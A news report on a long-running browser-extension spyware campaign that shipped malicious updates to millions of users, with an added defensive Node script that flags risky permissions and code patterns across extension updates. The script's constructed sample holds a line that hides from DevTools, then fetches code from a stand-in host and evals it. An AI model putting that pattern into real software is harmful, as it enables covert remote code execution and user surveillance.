
Chinese Hackers Used Legit Browser Extensions to Spy on 4.3 Million Users for 7 Years

A browser extension attack that went undetected for years has affected millions of Google Chrome and Microsoft Edge users. The Chinese actors behind it planned for the long term in order to reach as many victims as possible.

Add-ons positioned for years

As the security company Koi reports, a suspected Chinese hacker group called ShadyPanda infiltrated around 4.3 million computers over the course of seven years using initially inconspicuous add-ons. The attackers took a particularly perfidious approach: first they published seemingly harmless productivity tools and, over the years, built up high popularity, positive reviews and millions of installations; only later did they ship malicious updates. Because the major platforms mainly check extensions when they are first submitted, the manipulated versions could be distributed largely unnoticed. Even add-ons with “Featured” or “Verified” status were turned from practical helpers into spy tools. According to Koi, no phishing or deception was necessary: trust in established extensions was enough to install comprehensive monitoring on millions of browsers.

At least five extensions belonging to the network are said to still be available in the Edge Store, with more than four million installations between them. According to the researchers, two of them already contain active spying functions. One of the problematic extensions, WeTab, is said to have over three million users alone and transmits extensive data in real time to several servers in China and to Google Analytics.

Several add-ons still active

Another example is the Chrome and Edge extension “Clean Master” from the provider Starlab Technology. Released in 2018 and 2019, it received official seals of approval and collected over 200,000 installs. In the summer of 2024, ShadyPanda distributed an update that retrofitted a remote access interface. Although the affected extensions have since been removed from the stores, Koi warns that the infrastructure for further attacks remains active.

The malware can load arbitrary JavaScript files, manipulate website content and log the user's entire browsing behavior. It also includes mechanisms designed to mislead researchers by simulating harmless behavior when the developer tools are opened. Koi sees the incidents as a structural problem of the large marketplaces: once extensions have been approved, they are hardly monitored. This allows attackers to roll out updates unnoticed at any time, with potentially serious consequences for millions of users.
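The pattern described above, a harmless first release followed by an update that adds surveillance capabilities, is exactly what a post-update review should look for. The following Node script is an added example written for this page; it is not Koi's tooling and not code from any of the extensions named here. It triages an unpacked extension by flagging permissions that enable long-term surveillance, a content security policy that admits remote or eval'd code, and source patterns that fetch and run code at runtime or change behavior when DevTools is open, then reports what an update added compared to the previous version. The permission and pattern lists are this example's own heuristics, and the two manifests and source files are constructed samples (the extension name, version numbers and the `example.invalid` host are invented).

```javascript
// Added example, not code from Koi or from the extensions named in the article.
// Static triage of an unpacked browser extension (MV2 or MV3 manifest).
// Permission list, host patterns and source regexes are this example's own heuristics.

// Permissions that, combined with broad host access, allow full browsing surveillance.
const HIGH_RISK_PERMISSIONS = new Set([
  'webRequest', 'webRequestBlocking', 'declarativeNetRequest', 'scripting',
  'tabs', 'cookies', 'history', 'webNavigation', 'management',
  'nativeMessaging', 'debugger',
]);

// Match patterns that grant access to every site.
const BROAD_HOSTS = [/^<all_urls>$/, /^\*:\/\/\*\/\*?$/, /^https?:\/\/\*\/\*?$/];

// Runtime-code and anti-analysis patterns worth a manual look.
const SOURCE_PATTERNS = [
  { name: 'eval', re: /\beval\s*\(/ },
  { name: 'Function constructor', re: /\bnew\s+Function\s*\(/ },
  { name: 'script tag injection', re: /createElement\s*\(\s*['"]script['"]\s*\)/ },
  // Classic "is DevTools docked?" heuristic: window chrome wider than the viewport.
  { name: 'devtools-open check', re: /outer(Width|Height)\s*-\s*(window\.)?inner\1/ },
];

function isBroadHost(pattern) {
  return BROAD_HOSTS.some((re) => re.test(pattern));
}

// Returns a list of findings for one manifest.
function triageManifest(manifest) {
  const findings = [];
  const perms = [
    ...(manifest.permissions || []),
    ...(manifest.optional_permissions || []),
  ];
  for (const p of perms) {
    if (HIGH_RISK_PERMISSIONS.has(p)) findings.push(`permission:${p}`);
  }
  // Host patterns live in `permissions` under MV2 and `host_permissions`
  // under MV3; content-script `matches` count as well.
  const hosts = [
    ...(manifest.host_permissions || []),
    ...perms.filter((p) => p === '<all_urls>' || p.includes('://')),
  ];
  for (const cs of manifest.content_scripts || []) hosts.push(...(cs.matches || []));
  if (hosts.some(isBroadHost)) findings.push('host:all-sites');
  // CSP is a string under MV2 and an object under MV3.
  const cspField = manifest.content_security_policy;
  const csp = typeof cspField === 'string' ? cspField : (cspField && cspField.extension_pages) || '';
  if (/unsafe-eval/.test(csp)) findings.push('csp:unsafe-eval');
  if (/script-src[^;]*https?:\/\//.test(csp)) findings.push('csp:remote-script-src');
  return findings;
}

// Returns the names of the SOURCE_PATTERNS present in one source file.
function triageSource(source) {
  return SOURCE_PATTERNS.filter(({ re }) => re.test(source)).map(({ name }) => name);
}

// What did an update add? New findings deserve review even if the store
// already approved the first version.
function addedFindings(before, after) {
  return after.filter((f) => !before.includes(f));
}

// --- constructed sample: a "new tab" helper before and after a malicious update ---
const MANIFEST_V1 = {
  manifest_version: 2, name: 'Tidy Tab', version: '1.0',
  permissions: ['storage'],
  chrome_url_overrides: { newtab: 'newtab.html' },
};
const MANIFEST_V2 = {
  manifest_version: 2, name: 'Tidy Tab', version: '1.1',
  permissions: ['storage', 'tabs', 'webRequest', '<all_urls>'],
  chrome_url_overrides: { newtab: 'newtab.html' },
  content_security_policy: "script-src 'self' https://example.invalid; object-src 'self'",
};
const SOURCE_V1 = `
chrome.storage.local.get('theme', ({ theme }) => { document.body.className = theme || 'light'; });
`;
const SOURCE_V2 = `
// stays quiet while DevTools is docked, otherwise pulls and runs a second stage
if (window.outerWidth - window.innerWidth < 160) {
  fetch('https://example.invalid/stage2.js').then((r) => r.text()).then((code) => eval(code));
}
`;

// Findings introduced by the update, manifest and source separately.
function reportUpdate() {
  return {
    manifest: addedFindings(triageManifest(MANIFEST_V1), triageManifest(MANIFEST_V2)),
    source: addedFindings(triageSource(SOURCE_V1), triageSource(SOURCE_V2)),
  };
}

console.log(JSON.stringify(reportUpdate(), null, 2));
```

On the constructed sample the update report lists the added `tabs` and `webRequest` permissions, all-site host access, a CSP that allows a remote script source, and a source file that both checks for DevTools and evals fetched code. The source scan matters as much as the manifest scan: Chrome disables an extension whose update requests new permission warnings until the user re-enables it, but an update that only changes code within already-granted permissions installs silently, which is the case the article describes.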
